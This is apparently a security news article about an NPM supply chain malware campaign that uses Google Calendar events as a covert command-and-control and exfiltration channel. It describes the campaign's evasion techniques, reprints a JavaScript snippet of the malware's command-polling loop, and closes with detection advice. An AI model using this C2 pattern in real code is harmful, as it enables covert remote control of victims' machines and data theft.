A new, sophisticated supply chain attack targeting the Node Package Manager (NPM) ecosystem has emerged, leveraging Google Calendar as a covert command and control (C2) channel.
Cybersecurity experts found the malware embedded in seemingly legitimate JavaScript libraries that, once installed, establish a stealthy communication pathway with attackers through popular Google services.
The malware has potentially compromised hundreds of development environments since its first appearance approximately two weeks ago, with infected packages having been downloaded over 35,000 times before discovery.
The attack begins when developers unknowingly install compromised NPM packages that contain obfuscated payloads designed to evade standard security scans.
Upon installation, the malicious code executes with the same privileges as the user, establishing persistence and initiating its communication protocol.
Unlike conventional C2 infrastructures that rely on suspicious domains, this attack method abuses trusted Google services, making detection particularly difficult for security tools configured to flag unusual network destinations.
Veracode researchers identified the threat after observing anomalous API calls to Google Calendar during routine security monitoring of development environments.
"What makes this attack particularly concerning is its abuse of legitimate cloud services," said Dr. Alex Chen, Principal Security Researcher at Veracode.
"By hiding in plain sight within Google Calendar events, the malware's communications blend perfectly with normal business traffic."
The malware uses OAuth tokens to authenticate with Google's API services, creating or modifying calendar events that contain encoded commands.
These seemingly innocuous calendar entries serve as both the control mechanism and the exfiltration channel, with attackers embedding commands in event descriptions, locations, and attendee fields.
The technique effectively bypasses many data loss prevention systems that typically whitelist Google services.
Further analysis reveals sophisticated anti-analysis techniques incorporated into the malware, including environment awareness checks that prevent execution in virtualized environments and under debugging tools.
The malware also implements a delayed execution pattern to evade sandbox detection, only activating its payload after determining that it resides in a legitimate development environment rather than an analysis system.
Calendar-Based Command & Control
The malware's Google Calendar C2 mechanism represents an innovative approach to maintaining persistent control.
After establishing initial access, the malware creates a hidden background process that periodically queries the user's Google Calendar using stolen OAuth credentials.
The following code snippet illustrates how the malware accesses the Calendar API:
const {google} = require('googleapis');
// Authenticate to the Calendar API with the stolen OAuth credential
const calendar = google.calendar({version: 'v3', auth: stolenOAuth});
async function checkForCommands() {
  const res = await calendar.events.list({
    calendarId: 'primary',
    timeMin: new Date().toISOString(),
    maxResults: 10,
    singleEvents: true,
    orderBy: 'startTime',
    q: 'sync_status' // Special marker used by the attackers to tag C2 events
  });
  const events = res.data.items;
  if (events.length) {
    const commands = decodeCommands(events[0].description);
    executeCommands(commands);
    // Delete or modify the event to acknowledge receipt
    await calendar.events.delete({calendarId: 'primary', eventId: events[0].id});
  }
}
The malware parses event descriptions for base64-encoded commands hidden within seemingly legitimate text.
These commands allow attackers to execute arbitrary code, exfiltrate sensitive data, or download additional payloads.
For data exfiltration, the malware encodes stolen information as calendar event attachments or within meeting notes.
Organizations are advised to implement strict OAuth application monitoring, perform comprehensive dependency scanning of Node.js projects, and deploy behavioral monitoring to detect anomalous Calendar API usage.
Security teams should specifically look for calendar modifications occurring outside normal user activity patterns, particularly those with embedded encoded content.